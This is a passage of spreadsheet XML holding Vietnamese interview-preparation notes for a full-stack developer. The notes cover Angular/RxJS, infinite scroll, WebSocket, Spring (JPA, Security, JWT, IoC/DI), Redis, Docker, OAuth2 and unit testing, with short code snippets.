  </si>
  <si>
    <t>filter()
.pipe(
  filter(user =&gt; user.isActive)
)
Lọc dữ liệu.</t>
  </si>
  <si>
    <t>tap()
.pipe(
  tap(data =&gt; console.log(data))
)
Dùng để debug hoặc thực hiện side effects.</t>
  </si>
  <si>
    <t>switchMap()
searchTerm$
.pipe(
  switchMap(term =&gt;
    this.http.get(`/api/search?q=${term}`)
  )
)
Hủy request cũ và chỉ giữ request mới nhất.</t>
  </si>
  <si>
    <t>Khi nào dùng switchMap?</t>
  </si>
  <si>
    <t>Trả lời:
Em dùng switchMap trong chức năng tìm kiếm realtime.
Khi người dùng gõ liên tục, request cũ sẽ bị hủy và chỉ giữ request mới nhất nhằm tránh gọi API dư thừa.</t>
  </si>
  <si>
    <t>this.searchControl.valueChanges
.pipe(
  debounceTime(300),
  distinctUntilChanged(),
  switchMap(keyword =&gt;
    this.api.search(keyword)
  )
)
.subscribe();</t>
  </si>
  <si>
    <t>switchMap khác mergeMap thế nào?</t>
  </si>
  <si>
    <t>switchMap
Hủy request cũ
Chỉ giữ request mới nhất
mergeMap
Chạy song song
Không hủy request</t>
  </si>
  <si>
    <t>Ví dụ hỏi:
Search box dùng gì?
=&gt; switchMap
Upload nhiều file cùng lúc?
=&gt; mergeMap</t>
  </si>
  <si>
    <t>Subject là gì?</t>
  </si>
  <si>
    <t>Trả lời:
Subject vừa là Observable vừa là Observer.</t>
  </si>
  <si>
    <t>const subject = new Subject&lt;string&gt;();
subject.subscribe(data =&gt; console.log(data));
subject.next('Hello');</t>
  </si>
  <si>
    <t>Em dùng RxJS cho State Management như thế nào?</t>
  </si>
  <si>
    <t>Trả lời:
Trong một số dự án Angular em sử dụng BehaviorSubject trong service để quản lý state đơn giản thay vì dùng NgRx.
Ví dụ lưu thông tin user hiện tại hoặc trạng thái đăng nhập.</t>
  </si>
  <si>
    <t>@Injectable()
export class UserService {
  private userSubject =
    new BehaviorSubject&lt;User | null&gt;(null);
  user$ =
    this.userSubject.asObservable();
  setUser(user: User) {
    this.userSubject.next(user);
  }
}</t>
  </si>
  <si>
    <t>Cách tránh Memory Leak?</t>
  </si>
  <si>
    <t>import { takeUntilDestroyed }  angularr 16+
from '@angular/core/rxjs-interop';
this.user$
.pipe(
  takeUntilDestroyed()
)
.subscribe();</t>
  </si>
  <si>
    <t>Async Pipe là gì?</t>
  </si>
  <si>
    <t>Async Pipe tự động subscribe và unsubscribe Observable trong template.</t>
  </si>
  <si>
    <t>&lt;div&gt;{{ user$ | async }}&lt;/div&gt;
Ưu điểm:
Code ngắn hơn
Tránh Memory Leak</t>
  </si>
  <si>
    <t>Infinite Scroll là gì?</t>
  </si>
  <si>
    <t>Infinite Scroll là kỹ thuật tự động tải dữ liệu mới khi người dùng cuộn gần cuối danh sách thay vì phải bấm phân trang hoặc nút Load More.</t>
  </si>
  <si>
    <t>Em triển khai như thế nào?</t>
  </si>
  <si>
    <t>Em sử dụng Intersection Observer API hoặc lắng nghe sự kiện scroll.
Khi phần tử sentinel ở cuối danh sách xuất hiện trong viewport, em gọi API lấy dữ liệu trang tiếp theo và append vào danh sách hiện tại.</t>
  </si>
  <si>
    <t>observer = new IntersectionObserver(entries =&gt; {
  if (entries[0].isIntersecting) {
     this.loadMore();
  }
});</t>
  </si>
  <si>
    <t>Tại sao không dùng pagination?</t>
  </si>
  <si>
    <t>Pagination phù hợp với dữ liệu cần tìm kiếm chính xác.
Infinite Scroll phù hợp với news feed hoặc social feed vì giúp người dùng tiếp tục xem nội dung mà không bị gián đoạn.</t>
  </si>
  <si>
    <t>Nếu API chậm?</t>
  </si>
  <si>
    <t>Em hiển thị skeleton loader trong lúc tải dữ liệu.
Đồng thời khóa việc gọi API tiếp theo bằng biến isLoading để tránh gọi nhiều request cùng lúc.</t>
  </si>
  <si>
    <t>Skeleton Loader là gì?</t>
  </si>
  <si>
    <t>Skeleton Loader là placeholder mô phỏng giao diện thực tế trong lúc dữ liệu chưa tải xong.
Nó giúp cải thiện perceived performance, tức là cảm giác ứng dụng tải nhanh hơn đối với người dùng.</t>
  </si>
  <si>
    <t>Vì sao Skeleton tốt hơn Spinner?</t>
  </si>
  <si>
    <t>Spinner chỉ cho người dùng biết hệ thống đang tải.
Skeleton cho người dùng biết nội dung sẽ xuất hiện ở đâu và có hình dạng như thế nào, giúp trải nghiệm tốt hơn.</t>
  </si>
  <si>
    <t>WebSocket là gì?</t>
  </si>
  <si>
    <t>WebSocket là giao thức giao tiếp hai chiều giữa client và server thông qua một kết nối TCP duy nhất.
Sau khi kết nối được thiết lập, cả client và server đều có thể chủ động gửi dữ liệu cho nhau.</t>
  </si>
  <si>
    <t>WebSocket khác HTTP thế nào?</t>
  </si>
  <si>
    <t xml:space="preserve">| HTTP                        | WebSocket          |
| --------------------------- | ------------------ |
| Request → Response          | Full Duplex        |
| Mỗi lần gửi tạo request mới | 1 kết nối duy nhất |
| Không realtime              | Realtime           |
| Polling                     | Push Event         |
</t>
  </si>
  <si>
    <t>Nếu gửi cùng lúc 1000 tin nhắn?</t>
  </si>
  <si>
    <t>Frontend chỉ hiển thị dữ liệu.
Việc scale sẽ do backend xử lý thông qua Message Queue hoặc WebSocket Gateway.
Ở phía frontend em sử dụng virtual scrolling nếu số lượng tin nhắn quá lớn.</t>
  </si>
  <si>
    <t>Làm sao hiển thị tin nhắn mới?</t>
  </si>
  <si>
    <t>Khi nhận sự kiện message từ WebSocket, em append message vào state và Angular tự render lại giao diện.
socket.onmessage = (event) =&gt; {
   this.messages.push(JSON.parse(event.data));
}</t>
  </si>
  <si>
    <t>Reactive Forms là gì?</t>
  </si>
  <si>
    <t>Reactive Forms là cách xây dựng form dựa trên TypeScript code thay vì template.
Nó phù hợp với các form phức tạp, có validation động và dễ kiểm thử.</t>
  </si>
  <si>
    <t>Reactive Forms khác Template Driven Forms?</t>
  </si>
  <si>
    <t xml:space="preserve">| Template              | Reactive            |
| --------------------- | ------------------- |
| Form nhỏ              | Form lớn            |
| Validation trong HTML | Validation trong TS |
| Khó test              | Dễ test             |
| Ít linh hoạt          | Linh hoạt           |
</t>
  </si>
  <si>
    <t>Tại sao em chọn Reactive Forms?</t>
  </si>
  <si>
    <t>Vì form có nhiều trường dữ liệu, validation phức tạp và phụ thuộc lẫn nhau nên Reactive Forms giúp dễ quản lý hơn.</t>
  </si>
  <si>
    <t>this.form = this.fb.group({
  email: [
    '',
    [Validators.required, Validators.email]
  ],
  password: [
    '',
    [Validators.required, Validators.minLength(8)]
  ]
});</t>
  </si>
  <si>
    <t>Virtual Scrolling là gì?</t>
  </si>
  <si>
    <t>Virtual Scrolling là kỹ thuật "đánh lừa" trình duyệt: Nó chỉ render (vẽ ra) những tin nhắn đang thực sự hiển thị trên màn hình của người dùng, cộng thêm một vài tin nhắn dự phòng ở trên và dưới.</t>
  </si>
  <si>
    <t>Cách hoạt động:
Màn hình điện thoại của bạn chỉ hiển thị được khoảng 20 tin nhắn cùng lúc.
Thay vì tạo 10,000 thẻ &lt;div&gt;, Virtual Scrolling chỉ tạo khoảng 30 thẻ &lt;div&gt; trong bộ nhớ.
Khi bạn cuộn tay xuống dưới, thay vì tạo thẻ mới, nó sẽ lấy cái thẻ &lt;div&gt; vừa bị khuất ở phía trên cùng, đẩy nó xuống dưới cùng, và thay thế nội dung (text) bên trong bằng dữ liệu của tin nhắn mới.
Nó tính toán tổng chiều cao của 10,000 tin nhắn để tạo ra một thanh cuộn (scrollbar) có độ dài y như thật, khiến bạn có cảm giác như tất cả dữ liệu đều đang ở đó.</t>
  </si>
  <si>
    <t>&lt;div class="chat-container"&gt;
  &lt;div class="message" *ngFor="let msg of messages"&gt;
    {{ msg.text }}
  &lt;/div&gt;
&lt;/div&gt;
&lt;cdk-virtual-scroll-viewport itemSize="50" class="chat-container"&gt;
  &lt;div class="message" *cdkVirtualFor="let msg of messages"&gt;
    {{ msg.text }}
  &lt;/div&gt;
&lt;/cdk-virtual-scroll-viewport&gt;</t>
  </si>
  <si>
    <t>đồng bộ và bất đồng bộ</t>
  </si>
  <si>
    <t>Đồng bộ (Synchronous) là các tác vụ thực hiện tuần tự, tác vụ sau phải chờ tác vụ trước hoàn thành. Bất đồng bộ (Asynchronous) là các tác vụ có thể được khởi tạo và tiếp tục thực hiện công việc khác mà không cần chờ kết quả ngay lập tức. Trong JavaScript, các thao tác như gọi API, đọc file, truy vấn database thường là bất đồng bộ và được xử lý thông qua Callback, Promise hoặc Async/Await để tránh làm treo luồng chính của ứng dụng.</t>
  </si>
  <si>
    <t>Ví dụ thực tế
Nếu gọi API lấy danh sách người dùng mất 3 giây:
Đồng bộ: ứng dụng phải đứng chờ 3 giây.
Bất đồng bộ: ứng dụng vẫn render giao diện, người dùng vẫn thao tác được, khi API trả về thì cập nhật dữ liệu lên màn hình.
Đó chính là lý do Promise và Async/Await được sử dụng rất nhiều trong Angular, React, NodeJS và NestJS.</t>
  </si>
  <si>
    <t>middleware là gì?</t>
  </si>
  <si>
    <t>Pipelines và Middleware
Hãy xem lại middleware như một hệ thống lắp ráp các "bộ lọc" để xử lý request và response.
Khi một request HTTP đến server, nó sẽ đi vào một pipeline và đi qua từng middleware theo thứ tự.Mỗi middleware có thể làm một trong hai việc:
Thực thi và chuyển tiếp: Gọi next.Invoke() để chuyển request đến middleware tiếp theo.
Ngắn mạch (short-circuit) pipeline: Không gọi next.Invoke(). Điều này xảy ra khi một middleware xử lý xong và không muốn các middleware tiếp theo thực thi. Ví dụ, một middleware xác thực có thể trả về lỗi 401 Unauthorized và ngăn request tiếp tục.
Ví dụ:</t>
  </si>
  <si>
    <t>app.UseRouting(); // Middleware để định tuyến request
app.UseAuthentication(); // Middleware xác thực người dùng
app.UseAuthorization(); // Middleware kiểm tra quyền truy cập
app.MapControllers(); // Middleware để ánh xạ request tới các controller.  Trong ví dụ này, một request sẽ đi qua Routing, sau đó là Authentication, rồi Authorization. Nếu một trong số chúng ngắn mạch pipeline (ví dụ: người dùng chưa đăng nhập), request sẽ không bao giờ tới được MapControllers.</t>
  </si>
  <si>
    <t>Phân biệt var, dynamic, object</t>
  </si>
  <si>
    <t>var: Kiểu được quyết định trước khi chương trình chạy (thời điểm biên dịch).var age = 30; // Trình biên dịch hiểu ngay: 'age' là int.
// age = "thirty"; // Lỗi ngay lập tức, vì bạn đang cố gán string vào một biến int.</t>
  </si>
  <si>
    <t>dynamic: Kiểu được quyết định trong khi chương trình đang chạy (thời điểm thực thi).dynamic thing = 30; // Trình biên dịch không biết 'thing' là gì.
// Console.WriteLine(thing.ToUpper()); // Lỗi tại thời điểm chạy vì số 30 không có phương thức ToUpper().</t>
  </si>
  <si>
    <t>object là kiểu dữ liệu gốc (base type) của tất cả các kiểu dữ liệu khác trong .NET. Biến kiểu object có thể chứa bất kỳ giá trị nào. Tuy nhiên, để sử dụng giá trị đó (ngoài các phương thức chung của object như ToString(), Equals()...), bạn phải ép kiểu (casting) về kiểu dữ liệu cụ thể.object myObj = 10;
// Console.WriteLine(myObj + 5); // Lỗi: Không thể thực hiện phép toán trên kiểu object
int number = (int)myObj; // Phải ép kiểu tường minh
Console.WriteLine(number + 5); // Kết quả: 15</t>
  </si>
  <si>
    <t>restfulapi là gì</t>
  </si>
  <si>
    <t>là một kiến trúc thiết kế API sử dụng giao thức HTTP để giao tiếp giữa các hệ thống máy tính. Nó tuân theo một bộ nguyên tắc và ràng buộc nhất định để tạo ra một hệ thống web hiệu quả, dễ mở rộng và bảo trì.</t>
  </si>
  <si>
    <t>Spring Data JPA là gì? Vai trò của nó trong ứng dụng Spring.</t>
  </si>
  <si>
    <t>&gt; Spring Data JPA là một phần của Spring Data project, giúp đơn giản hóa việc triển khai tầng Data Access Layer (DAL) trong các ứng dụng Spring.
&gt; Nó cung cấp một tầng trừu tượng (abstraction layer) trên JPA (Java Persistence API) và Hibernate (hoặc các JPA provider khác), cho phép lập trình viên tương tác với database chỉ bằng cách định nghĩa các interface Repository và các phương thức truy vấn dựa trên tên phương thức (method name convention) hoặc @Query annotation.
&gt; Vai trò: Giảm đáng kể lượng boilerplate code (code lặp lại) cần thiết để thực hiện các thao tác CRUD (Create, Read, Update, Delete) và các truy vấn phức tạp hơn với database, giúp tăng tốc độ phát triển.</t>
  </si>
  <si>
    <t>Spring Data JPA là một công cụ mạnh mẽ giúp đơn giản hóa việc truy cập cơ sở dữ liệu trong các ứng dụng Spring bằng cách tự động tạo ra mã thực thi truy vấn dựa trên các tên phương thức khai báo.</t>
  </si>
  <si>
    <t>Thế nào là một Repository trong Spring Data JPA? Kể tên một số phương thức phổ biến bạn đã sử dụng.</t>
  </si>
  <si>
    <t>&gt; Một Repository trong Spring Data JPA là một interface mà bạn định nghĩa để tương tác với một entity cụ thể trong database. Nó kế thừa từ các interface như CrudRepository hoặc JpaRepository.
&gt; Spring Data JPA sẽ tự động tạo ra implementation (hiện thực) cho các phương thức trong Repository của bạn dựa trên tên phương thức hoặc các annotation.</t>
  </si>
  <si>
    <t>Spring Security là gì và mục đích của nó?</t>
  </si>
  <si>
    <t>&gt; Spring Security là một framework bảo mật mạnh mẽ và rất linh hoạt, cung cấp các dịch vụ xác thực (authentication) và ủy quyền (authorization) cho các ứng dụng Java.
Mục đích:
&gt; Authentication (Xác thực): Xác minh danh tính của người dùng (ví dụ: đăng nhập bằng username/password).
Authorization (Ủy quyền): Xác định quyền truy cập của người dùng đã được xác thực vào các tài nguyên hoặc chức năng cụ thể của ứng dụng.
&gt; Bảo vệ ứng dụng khỏi các lỗ hổng bảo mật phổ biến như CSRF (Cross-Site Request Forgery), XSS (Cross-Site Scripting).</t>
  </si>
  <si>
    <t>Phân biệt Authentication và Authorization trong Spring Security.</t>
  </si>
  <si>
    <t>&gt; Authentication (Xác thực): Là quá trình xác minh danh tính của người dùng. "Bạn là ai?". Ví dụ: nhập tên người dùng và mật khẩu để chứng minh bạn là người dùng đó.
&gt; Authorization (Ủy quyền): Là quá trình xác định quyền của người dùng đã được xác thực để truy cập vào một tài nguyên hoặc thực hiện một hành động cụ thể. "Bạn có quyền làm gì?". Ví dụ: sau khi đăng nhập, một người dùng có vai trò "ADMIN" có thể truy cập trang quản lý người dùng, trong khi người dùng "USER" thì không.</t>
  </si>
  <si>
    <t>JWT (JSON Web Token) là gì và tại sao nó được sử dụng trong các ứng dụng web hiện đại?</t>
  </si>
  <si>
    <t>&gt; JWT là một chuẩn mở (RFC 7519) để tạo các token bảo mật, cho phép truyền tải thông tin một cách an toàn giữa các bên dưới dạng đối tượng JSON.
&gt; Cấu trúc JWT: Gồm 3 phần được phân cách bởi dấu chấm (.): Header, Payload, và Signature.
&gt; Header: Loại token (JWT) và thuật toán mã hóa (HMAC SHA256 hoặc RSA).
&gt; Payload: Chứa các claims (thông tin về người dùng, quyền hạn, thời gian hết hạn...).
&gt; Signature: Dùng để xác minh tính toàn vẹn của token, đảm bảo nó không bị thay đổi.
Tại sao sử dụng:
&gt; Stateless (Không trạng thái): Server không cần lưu trữ session của người dùng, giúp mở rộng ứng dụng dễ dàng hơn (scalability).
&gt; Decentralized Authentication: Phù hợp cho kiến trúc Microservices, nơi nhiều dịch vụ cần xác thực người dùng.
&gt; Bảo mật: Chữ ký số đảm bảo tính toàn vẹn của dữ liệu.
&gt; Phù hợp với RESTful APIs: JWT được gửi trong Header của mỗi request HTTP.</t>
  </si>
  <si>
    <t>Làm thế nào để Spring Security làm việc với JWT? (Mức độ cơ bản)</t>
  </si>
  <si>
    <t>Khi người dùng đăng nhập thành công, server tạo ra một JWT và gửi lại cho client.
Client lưu trữ JWT (thường là trong Local Storage hoặc Cookie).
Ở mỗi request tiếp theo, client gửi JWT trong Header (Authorization: Bearer token).
Spring Security, thông qua các bộ lọc (Filter), sẽ chặn request, trích xuất JWT, xác thực chữ ký của JWT.
Nếu token hợp lệ và chưa hết hạn, Spring Security sẽ trích xuất thông tin người dùng (từ Payload) và thiết lập đối tượng Authentication trong SecurityContextHolder, cho phép ủy quyền dựa trên các quyền hạn trong token.</t>
  </si>
  <si>
    <t>Redis là gì? Tại sao nó được sử dụng cùng với các ứng dụng Java/Spring?</t>
  </si>
  <si>
    <t>&gt; Redis (Remote Dictionary Server) à một mã nguồn mở được dùng để lưu trữ dữ liệu có cấu trúc, có thể sử dụng như một database, bộ nhớ cache hay một message broker.
&gt;? Nó hỗ trợ nhiều kiểu dữ liệu khác nhau như strings, hashes, lists, sets, sorted sets.
Tại sao sử dụng với Java/Spring:
&gt; Caching: Redis được sử dụng rộng rãi làm bộ nhớ đệm (cache) để lưu trữ dữ liệu thường xuyên được truy cập từ database, giúp giảm tải cho database và tăng tốc độ phản hồi của ứng dụng.
&gt; Session Management: Trong các ứng dụng phân tán, Redis có thể lưu trữ session của người dùng, cho phép người dùng truy cập vào bất kỳ instance nào của ứng dụng.
&gt; Message Broker: Có thể dùng cho hàng đợi tin nhắn (message queues) hoặc publish/subscribe.
&gt; High Performance: Do lưu trữ trong bộ nhớ, Redis cung cấp hiệu suất đọc/ghi cực kỳ nhanh.</t>
  </si>
  <si>
    <t>Làm thế nào để xử lý lỗi (Exception Handling) trong Spring Boot REST API?</t>
  </si>
  <si>
    <t>Gợi ý trả lời:
&gt; Sử dụng @ControllerAdvice và @ExceptionHandler để tạo một cơ chế xử lý lỗi tập trung (global exception handling).
&gt; @ControllerAdvice: Một annotation cấp độ class, cho phép một class xử lý exception trên toàn bộ ứng dụng.
&gt; @ExceptionHandler: Một annotation cấp độ method, được sử dụng bên trong @ControllerAdvice để chỉ định phương thức nào sẽ xử lý loại exception cụ thể.
&gt; Trả về các HTTP status code phù hợp (ví dụ: 400 Bad Request, 404 Not Found, 500 Internal Server Error).
&gt; Sử dụng @ResponseStatus trên các custom exception để tự động trả về HTTP status code mong muốn.</t>
  </si>
  <si>
    <t>hãy giải thích rõ cho tôi IoC trong java spring là gì và tại sao cần sử dụng nó</t>
  </si>
  <si>
    <t xml:space="preserve"> &gt; Spring framework (chính xác hơn là Spring IoC Container) sẽ đảm nhận trách nhiệm tạo, cấu hình và quản lý các đối tượng trong ứng dụng của bạn, thay vì bạn phải tự làm điều đó. &gt; Tight Coupling (Phụ thuộc chặt chẽ): Lớp UserService trực tiếp tạo ra một new UserRepository(). Điều này có nghĩa là UserService bị ràng buộc chặt chẽ với một triển khai cụ thể của UserRepository.
&gt; Khó kiểm thử (Hard to Test): Khi bạn muốn kiểm thử UserService, bạn không thể dễ dàng thay thế UserRepository bằng một đối tượng giả lập (mock object) để tránh tương tác với cơ sở dữ liệu thật. Bạn luôn phải làm việc với UserRepository thật.
&gt; Khó thay đổi (Hard to Change): Nếu sau này bạn muốn thay đổi cơ chế lưu trữ dữ liệu (ví dụ: từ database sang một file system), bạn sẽ phải sửa đổi code trong UserService (hoặc bất kỳ lớp nào khác đang new UserRepository()). Điều này vi phạm nguyên tắc "Open/Closed Principle" (Mở rộng nhưng đóng để sửa đổi).&gt; @Component: Chúng ta đánh dấu UserRepositorySpring và UserServiceSpring là các Spring Beans. Điều này báo cho Spring biết rằng đây là những đối tượng mà nó cần quản lý.
&gt; @Autowired trên Constructor: Trong UserServiceSpring, chúng ta sử dụng @Autowired trên constructor. Khi Spring IoC Container thấy điều này, nó sẽ tự động tìm một bean kiểu UserRepositorySpring trong container của nó và "tiêm" vào constructor khi tạo UserServiceSpring. Constructor vs Setter Injection:
Constructor Injection (Khuyên dùng):
&gt; Đảm bảo rằng tất cả các phụ thuộc bắt buộc đều được cung cấp khi đối tượng được tạo (đảm bảo tính bất biến - immutability).
&gt; Đối tượng luôn ở trạng thái hợp lệ ngay sau khi khởi tạo.
&gt; Giúp dễ dàng kiểm thử hơn vì bạn có thể tạo đối tượng với các phụ thuộc giả lập ngay lập tức.
Setter Injection:
&gt; Thích hợp cho các phụ thuộc tùy chọn (optional dependencies) hoặc khi bạn có nhiều phụ thuộc và constructor sẽ trở nên quá dài.
&gt; Đối tượng có thể ở trạng thái không đầy đủ sau khi khởi tạo cho đến khi setter được gọi.</t>
  </si>
  <si>
    <t>Tại sao cần sử dụng nó</t>
  </si>
  <si>
    <t>Quay lại với ví dụ UserService và UserRepository:
Giảm sự phụ thuộc (Reduced Coupling):
Trước IoC: UserService phải tự tạo UserRepository. Nếu UserRepository thay đổi cách khởi tạo (ví dụ, cần thêm tham số), UserService cũng phải thay đổi.
Với IoC: UserService không còn quan tâm UserRepository được tạo ra như thế nào. Nó chỉ khai báo nó cần một UserRepository, và Spring sẽ "tiêm" vào. Sự thay đổi trong UserRepository không ảnh hưởng đến code của UserService.
Tăng khả năng kiểm thử (Improved Testability):
Trước IoC: Để kiểm thử UserService, bạn cần một UserRepository thật (có thể kết nối đến DB thật), làm cho unit test trở thành integration test và chậm hơn.
Với IoC: Bạn có thể dễ dàng tạo một MockUserRepository (một phiên bản giả lập của UserRepository không tương tác với DB) và "tiêm" vào UserService khi kiểm thử, giúp bạn kiểm thử logic của UserService một cách độc lập và nhanh chóng.&gt; Dễ dàng cấu hình (Easier Configuration):
&gt; Bạn có thể thay đổi cách các bean được tạo hoặc các phụ thuộc được tiêm mà không cần sửa đổi code nguồn. Ví dụ, nếu bạn có hai triển khai của UserRepository (một cho SQL DB, một cho NoSQL DB), bạn chỉ cần thay đổi cấu hình Spring để sử dụng triển khai mong muốn mà không cần chạm vào UserService.
Giảm code lặp lại (Reduced Boilerplate Code):
&gt; Bạn không cần viết code để tạo new từng đối tượng phụ thuộc. Spring tự động làm điều đó.</t>
  </si>
  <si>
    <t>giải thích cho tôi DI và IoC trong spring: IoC là một nguyên tắc thiết kế trong đó luồng điều khiển của chương trình được đảo ngược so với lập trình truyền thống. Thay vì code của bạn gọi các framework, framework sẽ gọi code của bạn.</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">IoC là một nguyên tắc thiết kế phần mềm, trong đó </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>kiểm soát luồng hoặc sự phụ thuộc của một đối tượng được chuyển giao (đảo ngược) từ chính đối tượng đó sang một khuôn khổ (framework) hoặc một container bên ngoài</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>.Tóm lại, IoC là một nguyên tắc thiết kế, và DI là một cách để triển khai nguyên tắc đó. Spring Framework sử dụng IoC Container để tự động hóa quá trình DI, mang lại một cách tiếp cận mạnh mẽ và linh hoạt để xây dựng các ứng dụng Ja) Bean:
Là các đối tượng được quản lý bởi Spring IoC Container
Được đánh dấu bằng các annotation như @Component, @Service, @Repository, @Controllerva.Spring IoC Container:
Là trung tâm quản lý các bean trong ứng dụng
Chịu trách nhiệm tạo, cấu hình và quản lý vòng đời của các bean</t>
    </r>
  </si>
  <si>
    <t>// Cách truyền thống (không sử dụng IoC)
public class ProductService {
    // Tự tạo instance của repository
    private ProductRepository productRepository = new ProductRepositoryImpl();
    public void createProduct(Product product) {
        productRepository.save(product);
    }
}
// Cách sử dụng IoC
@Service
@RequiredArgsConstructor
public class ProductService {
    // Spring IoC Container sẽ tạo và quản lý instance
    private final ProductRepository productRepository;
    public void createProduct(Product product) {
        productRepository.save(product);
    }
}</t>
  </si>
  <si>
    <t>DI là một dạng cụ thể của IoC, trong đó các dependency được inject vào một class thay vì class tự tạo ra chúng.</t>
  </si>
  <si>
    <t>cách tốt nhất : @Service
@RequiredArgsConstructor
public class ProductService {
    private final ProductRepository productRepository;
    private final CategoryRepository categoryRepository;
}</t>
  </si>
  <si>
    <t>Service
public class ProductService {
    private ProductRepository productRepository;
    @Autowired
    public void setProductRepository(ProductRepository productRepository) {
        this.productRepository = productRepository;
    }
}</t>
  </si>
  <si>
    <t>không khuyến nghị : Service
public class ProductService {
    @Autowired
    private ProductRepository productRepository;
}</t>
  </si>
  <si>
    <t>Docker là gì? Bạn hiểu gì về Docker?</t>
  </si>
  <si>
    <t xml:space="preserve"> Docker là một nền tảng mở cho phép đóng gói ứng dụng và tất cả các phụ thuộc của nó vào một đơn vị độc lập gọi là Container. Nó giúp giải quyết vấn đề "chạy trên máy tôi thì được, trên máy bạn thì không" bằng cách đảm bảo môi trường chạy ứng dụng nhất quán.</t>
  </si>
  <si>
    <t>Giải thích sự khác nhau giữa Docker Image và Docker Container?</t>
  </si>
  <si>
    <t>Docker Image: Là một khuôn mẫu (template) chỉ đọc, chứa tất cả những gì cần thiết để chạy một ứng dụng (mã nguồn, runtime, thư viện, cấu hình...). Nó giống như một bản thiết kế hoặc một "ảnh chụp" của hệ thống file.
Docker Container: Là một thể hiện đang chạy (runtime instance) của một Docker Image. Nó là một môi trường biệt lập, nhẹ, nơi ứng dụng thực sự chạy. Bạn có thể tạo, khởi động, dừng, xóa nhiều Container từ một Image.</t>
  </si>
  <si>
    <t>Dockerfile là gì? Vai trò của nó?</t>
  </si>
  <si>
    <t>Dockerfile là một file văn bản chứa các chỉ dẫn từng bước để xây dựng một Docker Image. Nó giống như một "công thức" mô tả cách tạo ra một môi trường đóng gói cho ứng dụng của bạn. Vai trò của nó là đảm bảo quá trình xây dựng Image là tự động và có thể tái tạo.</t>
  </si>
  <si>
    <t>Tại sao lại cần Docker? Nó giải quyết vấn đề gì?</t>
  </si>
  <si>
    <t>Docker giải quyết vấn đề "môi trường không nhất quán" giữa các giai đoạn phát triển, thử nghiệm và triển khai. Nó đảm bảo ứng dụng chạy giống nhau ở mọi nơi, loại bỏ xung đột phụ thuộc, và giúp việc đóng gói, vận chuyển ứng dụng trở nên dễ dàng, nhanh chóng hơn.</t>
  </si>
  <si>
    <t>Bạn đã bao giờ sử dụng Docker Compose chưa? Nó dùng để làm gì?</t>
  </si>
  <si>
    <t>Nếu có, hãy nói bạn đã dùng để làm gì (ví dụ: chạy ứng dụng Spring Boot kèm MySQL/PostgreSQL).
Docker Compose là một công cụ giúp định nghĩa và chạy các ứng dụng Docker đa container (multi-container). Thay vì chạy từng container một bằng lệnh docker run, bạn có thể định nghĩa tất cả các dịch vụ (như ứng dụng backend, database, frontend) trong một file docker-compose.yml duy nhất và khởi chạy tất cả chúng chỉ bằng một lệnh docker compose up. Nó rất hữu ích cho môi trường phát triển cục bộ.</t>
  </si>
  <si>
    <t>OAuth2 là một giao thức xác thực cho phép ứng dụng của chúng ta truy cập thông tin người dùng từ các nhà cung cấp dịch vụ (như Facebook, Google) mà không cần mật khẩu. Luồng xác thực gồm các bước:</t>
  </si>
  <si>
    <t>Ứng dụng của chúng ta tạo URL xác thực với client_id và redirect_uri
Người dùng được chuyển hướng đến trang đăng nhập của nhà cung cấp
Sau khi đăng nhập thành công, nhà cung cấp trả về một authorization code
Ứng dụng của chúng ta đổi code này lấy access token
Sử dụng access token để truy cập thông tin người dùng</t>
  </si>
  <si>
    <t>Cấu hình đa ngôn ngữ i18n</t>
  </si>
  <si>
    <t>Đầu tiên thiết lập i18n trong resource và tạo 2 file cấu hình đa ngôn ngữ en và vi. Sau đó tạo 1 file config,bean cấu hình cho nó rồi tạo class LocalizationUtils để xử lý đa ngôn ngữ và cuối cùng tạo 1 file định nghĩa message keys để dễ dàng gọi đến hơn</t>
  </si>
  <si>
    <t>Unit Test (Kiểm thử đơn vị)</t>
  </si>
  <si>
    <t>Đơn vị (Unit): Là phần nhỏ nhất, có thể kiểm thử được và độc lập của mã nguồn. Một "unit" có thể là một hàm (function), một phương thức (method), một lớp (class), hoặc một module riêng lẻ.
Mục đích: Kiểm tra xem mỗi đơn vị code riêng lẻ có hoạt động đúng như mong đợi hay không, trong sự cô lập hoàn toàn với các phần khác của hệ thống.
Ai thực hiện: Chủ yếu do lập trình viên (developer) viết và thực hiện. Họ là người hiểu rõ nhất về logic nội bộ của từng đơn vị code.
Loại kiểm thử: Thường là White-box testing (kiểm thử hộp trắng), nghĩa là người kiểm thử có kiến thức về cấu trúc nội bộ, mã nguồn và thiết kế của đơn vị đang được kiểm thử.
Thời điểm: Thực hiện sớm nhất trong vòng đời phát triển phần mềm, ngay sau khi đơn vị code được viết.</t>
  </si>
  <si>
    <t>// Lớp Calculator.java
public class Calculator {
    public int add(int a, int b) {
        return a + b;
    }
    public int subtract(int a, int b) {
        return a - b;
    }
}</t>
  </si>
  <si>
    <t>// Lớp CalculatorTest.java
import org.junit.jupiter.api.Test;
import static org.junit.jupiter.api.Assertions.assertEquals;
public class CalculatorTest {
    @Test
    void testAddPositiveNumbers() {
        Calculator calculator = new Calculator();
        assertEquals(5, calculator.add(2, 3), "2 + 3 should be 5");
    }
    @Test
    void testAddNegativeNumbers() {
        Calculator calculator = new Calculator();
        assertEquals(-5, calculator.add(-2, -3), "-2 + -3 should be -5");
    }
    @Test
    void testAddZero() {
        Calculator calculator = new Calculator();
        assertEquals(10, calculator.add(10, 0), "10 + 0 should be 10");
    }
}</t>
  </si>
  <si>
    <t>Integration Test (Kiểm thử tích hợp)</t>
  </si>
  <si>
    <t>Tích hợp (Integration): Là quá trình kết hợp các đơn vị (hoặc nhóm đơn vị, module) đã được kiểm thử độc lập lại với nhau và kiểm thử sự tương tác, giao tiếp giữa chúng.
Mục đích: Phát hiện các lỗi phát sinh do sự tương tác, giao tiếp, truyền dữ liệu giữa các module khác nhau hoặc giữa hệ thống với các dịch vụ bên ngoài (database, API của bên thứ ba, hệ thống file, v.v.).
Ai thực hiện: Có thể là lập trình viên (để kiểm tra tích hợp các module mà họ viết) hoặc kiểm thử viên (QA/Tester).
